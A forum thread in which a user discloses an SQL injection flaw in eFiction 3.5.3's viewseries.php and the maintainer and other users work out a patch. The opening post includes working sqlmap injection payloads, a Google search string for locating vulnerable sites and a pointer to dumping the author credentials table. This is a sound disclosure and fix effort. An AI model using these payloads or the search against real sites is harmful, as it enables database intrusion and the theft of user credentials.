Forum

Notifications
Clear all

[Sticky] SQL Injection vulnerability in eFiction

Page 1 / 2
Anonymous
 Anonymous
(@Anonymous)
Guest

Hello ...

The viewseries.php page in eFiction 3.5.3 is vulnerable to an SQL Injection attack.
The page loads the URL parameter "seriesid":

    $seriesid = isset($_GET['seriesid']) ? $_GET['seriesid'] : false;

Then it passes the *tainted* value directly down to the database:

    $parents = dbquery("SELECT s.title, s.seriesid FROM ".TABLEPREFIX."fanfiction_inseries as i,
    ".TABLEPREFIX."fanfiction_series as s WHERE s.seriesid = i.seriesid AND i.subseriesid = '$seriesid'");

This allows an attacker to extract information from the underlying database.

    sqlmap identified the following injection points with a total of 396 HTTP(s) requests:
    ---
    Place: GET
    Parameter: seriesid
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: seriesid=1' AND 9530=9530 AND 'xaMV'='xaMV

        Type: error-based
        Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause
        Payload: seriesid=-1947' OR ROW(2257,7329)>(SELECT COUNT(*),CONCAT(0x716e656e71,(SELECT (CASE WHEN (2257=2257) THEN 1 ELSE 0 END)),0x716c746b71,FLOOR(RAND(0)*2))x FROM (SELECT 7852 UNION SELECT 4197 UNION SELECT 3571 UNION SELECT 7903)a GROUP BY x) AND 'zplx'='zplx

        Type: AND/OR time-based blind
        Title: MySQL > 5.0.11 AND time-based blind
        Payload: seriesid=1' AND SLEEP(5) AND 'hXxL'='hXxL
    ---
    [2041] [INFO] testing MySQL
    [2042] [INFO] confirming MySQL
    [2045] [INFO] the back-end DBMS is MySQL
    [2045] [INFO] fetching banner
    [2045] [INFO] retrieving the length of query output
    [2045] [INFO] retrieved: 20
    [2025] [INFO] retrieved: 5.1.69-community-log
    [2025] [INFO] actively fingerprinting MySQL
    [2028] [INFO] executing MySQL comment injection fingerprint
    web application technology: Apache, PHP 5.2.17
    back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0
              banner parsing fingerprint: MySQL 5.1.69, logging enabled
    banner:    '5.1.69-community-log'

Vulnerable sites can be found using Google by executing this search:

    inurl:"viewseries.php?seriesid="

The complete list of usernames/passwords can be obtained by dumping the fanfiction_authors table.

Anybody running eFiction 3.5.3 should be advised that their user credentials are available to the public.

... Robert

Quote
Posted : 12/11/2014 7:46 pm
Sheepcontrol
(@sheepcontrol)
Reputable Member

YOU NEED TO DO THIS A.S.A.P.

Step 1:
Open includes/mysqli_functions.php, find:

// Used to escape text being put into the database.
function escapestring($str) {
global $dbconnect;
  return $dbconnect->real_escape_string($str);
}

Modify to:

// Used to escape text being put into the database.
function escapestring($str) {
global $dbconnect;
  if (!is_array($str)) return $dbconnect->real_escape_string($str);
  return array_map('escapestring', $str);
}

(You can skip step 2 if you know are using mysqli extension, if you are not sure, better do it.)
Step 2:
Open includes/mysql_functions.php, find at or around line 56:

// Used to escape text being put into the database.
function escapestring($str) {
  if(version_compare(phpversion(),"4.3.0")=="-1") {
    $str = mysql_escape_string($str);
  } else {
    $str = mysql_real_escape_string($str);
  }
  return $str;
}

Modify to:

// Used to escape text being put into the database.
function escapestring($str) {
  if (!is_array($str)) return mysql_real_escape_string($str);
  else return array_map('escapestring', $str);
}

This will no longer probe for PHP versions before 4.3.0, but honestly, this would mean your web server has not been updated since around 2003.

Step 3:
Completely scratched for breaking several forms.

Step 4:
Open viewseries.php, find around line 36:

include(_BASEDIR."includes/pagesetup.php");


$seriesid = isset($_GET['seriesid']) ? $_GET['seriesid'] : false;

change last line of above to:

$seriesid = (isset($_GET['seriesid']) && is_numeric($_GET['seriesid'])) ? escapestring($_GET['seriesid']) : false;

First tests indicate this is
1) working
2) fixing the injection issue
3) should work now

Update #1: Added viewseries.php as file to be modified
Update #2: Fixed a typo above, Step 1 hits includes/mysqli_functions.php, Step 2 goes for includes/mysql_functions.php
Update #3: Convenience fix, packed the affected files in a zip-archive, just unpack and upload, do not edit anything else.

I am sorry, this may seem a bit unorganized, and in fact it is, which has to do with the fact that I am not really into the 3.5.3 code, I merely took the project over with the intention of bringing it to version 5.0.0, which is underway, but not quite ready for release.

Updated package is postponed, also, until this fix has become somewhat stable.

ReplyQuote
Posted : 13/11/2014 4:31 am
Sheepcontrol
(@sheepcontrol)
Reputable Member

Ran a test, because $seriesid is straight forward used to build links, it still shows up as injected, but the actual DB query is safe.

ReplyQuote
Posted : 13/11/2014 6:31 am
kaehana
(@kaehana)
New Member

I did this change but now when I click submit button everything is OK but when I want to echo inserted text, it shows between the lines "rn" (in database shows rn). I tried to remove these tags but it doesn't disapear. How could I remove these tags?

ReplyQuote
Posted : 13/11/2014 7:51 am
Purpleyin
(@purpleyin)
Active Member

(You can skip step 2 if you know are using mysqli extension, if you are not sure, better do it.)
Step 2:
Open includes/mysqli_functions.php, find at or around line 56:

// Used to escape text being put into the database.
function escapestring($str) {
  if(version_compare(phpversion(),"4.3.0")=="-1") {
    $str = mysql_escape_string($str);
  } else {
    $str = mysql_real_escape_string($str);
  }
  return $str;
}

Modify to:

// Used to escape text being put into the database.
function escapestring($str) {
  if (!is_array($str)) return mysql_real_escape_string($str);
  else return array_map('escapestring', $str);
}

This will no longer probe for PHP versions before 4.3.0, but honestly, this would mean your web server has not been updated since around 2003.

I couldn't find that code in includes/mysqli_functions.php but could in includes/mysql_functions.php, so was assuming there's a tiny typo in step 2 or am I wrong and my files are different than expected somehow?

ReplyQuote
Posted : 13/11/2014 7:54 am
Sheepcontrol
(@sheepcontrol)
Reputable Member

I couldn't find that code in includes/mysqli_functions.php but could in includes/mysql_functions.php, so was assuming there's a tiny typo in step 2 or am I wrong and my files are different than expected somehow?

Yes, there was a typo in the instructions, Step 1 was mysqli, Step 2 mysql.
Thanks

ReplyQuote
Posted : 13/11/2014 8:25 am
Sheepcontrol
(@sheepcontrol)
Reputable Member

I did this change but now when I click submit button everything is OK but when I want to echo inserted text, it shows between the lines "rn" (in database shows rn). I tried to remove these tags but it doesn't disapear. How could I remove these tags?

Holy Batman, fired a bit too far here ^^

I changed the instructions above, in short terms: changes in the config.php modification, edit an additional file.

ReplyQuote
Posted : 13/11/2014 8:26 am
kaehana
(@kaehana)
New Member

Holy Batman, fired a bit too far here ^^

I changed the instructions above, in short terms: changes in the config.php modification, edit an additional file.

Thank you, now its ok

ReplyQuote
Posted : 13/11/2014 9:10 am
Sheepcontrol
(@sheepcontrol)
Reputable Member

Thanks for the feedback, good to know.

ReplyQuote
Posted : 13/11/2014 9:27 am
darklight
(@darklight)
Estimable Member

Thank you for getting on this so quick!

ReplyQuote
Posted : 13/11/2014 10:39 am
kaehana
(@kaehana)
New Member

Series doesnt show whit

$seriesid = (isset($_GET['seriesid']) && is_numeric($_GET['seriesid'])) ? escapestring($_GET['seriesid']) : false;

I get error in line 39 viewseries.php.

But its ok if I use:

$seriesid = isset($_GET['seriesid']) && is_numeric($_GET['seriesid']) ? escapestring($_GET['seriesid']) : false;

I dont know if it is ok to use this last code

ReplyQuote
Posted : 13/11/2014 10:53 am
Sheepcontrol
(@sheepcontrol)
Reputable Member

Series doesnt show whit

$seriesid = (isset($_GET['seriesid']) && is_numeric($_GET['seriesid'])) ? escapestring($_GET['seriesid']) : false;

I get error in line 39 viewseries.php.

But its ok if I use:

$seriesid = isset($_GET['seriesid']) && is_numeric($_GET['seriesid']) ? escapestring($_GET['seriesid']) : false;

I dont know if it is ok to use this last code

Now I have no idea why that doesn't work for you, double checked with my test site and it's just fine there, but your version seems to be ok, too.

ReplyQuote
Posted : 13/11/2014 11:08 am
Sue
 Sue
(@sue)
Estimable Member

Whoa - thanks Robert for the quick spot and thanks Sheepie for the fix.

ReplyQuote
Posted : 13/11/2014 2:48 pm
Charl
(@charl)
Active Member

A quick search didn't find those lines of code in the files. There was similar code but not the same.

Please hurry up on the fixed version as at least I can upload that!

ReplyQuote
Posted : 13/11/2014 5:05 pm
Sheepcontrol
(@sheepcontrol)
Reputable Member

A quick search didn't find those lines of code in the files. There was similar code but not the same.

Please hurry up on the fixed version as at least I can upload that!

I copied the code from an original version of eFiction 3.5.3, so if you files did indeed differ, that's strange.
Anyway, couldn't sleep so made the hotfix, full package including a few other fixes that came up within the next days, got family festivities coming my way.

ReplyQuote
Posted : 13/11/2014 8:54 pm
Page 1 / 2
Share: